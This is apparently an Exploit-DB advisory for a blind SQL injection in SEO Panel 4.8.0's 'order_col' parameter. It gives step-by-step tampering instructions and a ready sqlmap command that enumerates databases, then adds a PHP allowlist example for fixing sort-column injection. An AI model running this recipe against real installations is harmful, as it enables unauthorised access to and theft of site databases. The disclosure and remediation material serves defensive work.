SEO Panel 4.8.0 – ‘order_col’ Blind SQL Injection (1)

  • Author: Piyush Patil
    Date: 2021-03-18
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/49666/
  • # Exploit Title: SEO Panel 4.8.0 - 'order_col' Blind SQL Injection (1)
    # Date: 17/02/2021
    # Exploit Author: Piyush Patil
    # Vendor Homepage: https://www.seopanel.org/
    # Software Link: https://github.com/seopanel/Seo-Panel/releases/tag/4.8.0
    # Version: 4.8.0
    
    
    # Reference - https://github.com/seopanel/Seo-Panel/issues/209
    
    Step 1 - Login to the SEO Panel with admin credentials.
    Step 2 - Go to archive.php
    Step 3 - Change "order_col" value to "*" and copy the request
    Command: sqlmap -r request.txt --batch --level 5 --risk 3 --dbms MYSQL --dbs --technique=T --flush-session
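
On the fix side, a sort-column parameter such as "order_col" cannot be bound as a prepared-statement parameter, so the usual remedy is an allowlist lookup. The block below is an added example, not SEO Panel's code and not part of the original advisory; the function name safeOrderBy and the column names are hypothetical.

```php
<?php
declare(strict_types=1);

// Added example: not SEO Panel code. The column names are hypothetical.

/**
 * Turn a user-supplied sort column and direction into an ORDER BY clause.
 * Identifiers cannot be bound as prepared-statement parameters, so the
 * request value is never copied into SQL; it only selects an entry from
 * a fixed map of request name => real column name.
 */
function safeOrderBy(array $allowed, string $default, ?string $col, ?string $dir): string
{
    if ($col === null || !array_key_exists($col, $allowed)) {
        $col = $default; // unknown or missing value: fall back, never echo it into SQL
    }
    $direction = ($dir !== null && strtoupper($dir) === 'DESC') ? 'DESC' : 'ASC';
    return 'ORDER BY `' . $allowed[$col] . '` ' . $direction;
}

// Hypothetical allowlist for a report listing.
$allowed = [
    'keyword' => 'keyword',
    'rank'    => 'rank_position',
    'date'    => 'result_date',
];

// Constructed request values, including the "*" marker from Step 3.
$samples = [
    ['rank', 'desc'],
    ['*', 'asc'],
    ['keyword, 2', 'asc'],
    [null, null],
];

foreach ($samples as [$col, $dir]) {
    printf("%-14s => %s\n", var_export($col, true), safeOrderBy($allowed, 'date', $col, $dir));
}
```

Only the first sample selects its requested column; the other three fall back to the default. Values elsewhere in the same query (filters, limits) still belong in bound parameters, since the allowlist covers only the identifier.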